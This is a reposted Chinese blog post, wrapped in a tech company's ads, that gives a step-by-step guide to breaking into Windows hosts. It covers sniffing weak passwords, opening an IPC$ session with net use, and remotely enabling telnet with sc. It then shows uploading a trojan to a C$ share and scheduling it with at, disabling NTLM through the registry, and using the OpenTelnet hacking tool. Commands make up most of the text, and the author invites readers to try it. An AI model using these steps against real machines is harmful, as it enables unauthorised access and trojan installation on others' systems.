标签:copy 字典 guest send 来宾 follow cti 改变 执行
GPS平台、网站建设、软件开发、系统运维,找森大网络科技!
http://cnsendnet.taobao.com
来自森大科技官方博客
http://www.cnsendblog.com/index.php/?p=683
我看是很有用的 大家试试看 以前都是看大家上传的知识 ,我现在也为大家服务点
1 首先用流光嗅探得到对方密码,主要是弱口令,强壮密码需要一个很好的密码字典和机器性能以及网络速度以及耐心和运气,呵呵。
2 用net use命令建立ipc$连接 例如:net use \\ip\ipc$ "" /user:administrator
3 用sc命令把禁用的telnet服务变成自动 sc \\ip config tlntsvr start= auto
4 用sc命令将telnet启动 sc \\ip start tlntsvr
5 telnet登录 telnet ip
6 net share 建立c$共享 net share sharename=drive:path
7 copy命令上传木马 copy a.exe ip\c$
8 at命令定时执行 at \\ip time cmd
注意:如果对方采用了NTLM认证策略,可以连接网络注册表修改HKEYLOCAL\ MACHINE\SOFTWARE\MICROSOFT\TELNETSERVER\1.0下的NTLM键值由2改为0。
然后重新启动telnet服务。
有些朋友喜欢使用opentelnet远程开启telnet,其实道理一样,关键的问题还是要在之前获得帐户和密码。
OpenTelnet.exe是用来启动远程服务器的Telnet的工具软件,是一个黑客工具,很多网站有下载。
Opentelnet.exe的用法:
OpenTelnet.exe \\server <帐号> <密码> <NTLM认证方式> <Telnet端口>
比如下面的:(命令意思是连接192.168.1.2,帐号administrator,密码123456 ,0表示不使用NTLM认证方式,
Telnet的端口是90)
C:\>OpenTelnet.exe \\ip administrator 123456 0 90
当程序运行后得到:
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
就说明Telnet服务启动成功,并且使用的端口是90。这样,我们就能够得到一个开90端口的Windows 2000
Telnet服务
有几个小问题要注意一下:
1 在xpsp2当中,默认的本地安全策略中,已经设置了网络访问模式为“仅来宾”,而在帐户管理中,guest帐户是被禁用的。
2 在win03当中,默认的本地安全策略中,已经设置了网络访问模式为“经典”,而帐户管理中,guest帐户仍然是禁用的。
3 在使用net use命令的时候,往往是连接ipc$,需要有用户名和密码,所以不管是xp还是03中,需要把策略设置为经典。
4 检查一下共享,ipc$等等是否已经开启
***********************************************************2003中开启很多服务***********************************
使用SC命令远程开启计算机的服务
SC其实是一个命令工具而已,它具备开启计算机服务的功能,早期都把它认为是黑客工具,而在Windows 2003中将这个命令内置在操作系统中,可以使用它远程开启其他计算机的服务,包括了系统上已经禁用的服务
下面介绍该工具的使用,开启远程主机192.168.1.202的telnet服务(需要知道该主机的用户名和密码):
1.首先使用sc \\192.168.1.202 query tlntsvr来查看远程主机的telnet的服务状态,得到结果是stopped(已停止)
2.然后使用sc \\192.168.1.202 qc tlntsvr 查询当前的telnet服务的配置状况,发现是disabled(已禁用)
3.使用sc \\192.168.1.202 config tlntsvr start= auto使telnet服务开机自动启动
4.使用sc \\192.168.1.202 qc tlntsvr 查询经过配置的telnet服务是否已经发生改变,已经成为auto_start(自动启动)
5.使用sc \\192.168.1.202 start tlntsvr 来启动telnet服务
6.使用sc \\192.168.1.202 query tlntsvr 查看telnet服务是否已经在运行
7.接下来就可以使用telnet 192.168.1.202进行telnet了
GPS平台、网站建设、软件开发、系统运维,找森大网络科技!
http://cnsendnet.taobao.com
来自森大科技官方博客
http://www.cnsendblog.com/index.php/?p=683
标签:copy 字典 guest send 来宾 follow cti 改变 执行
原文地址:https://www.cnblogs.com/cnsend/p/12984431.html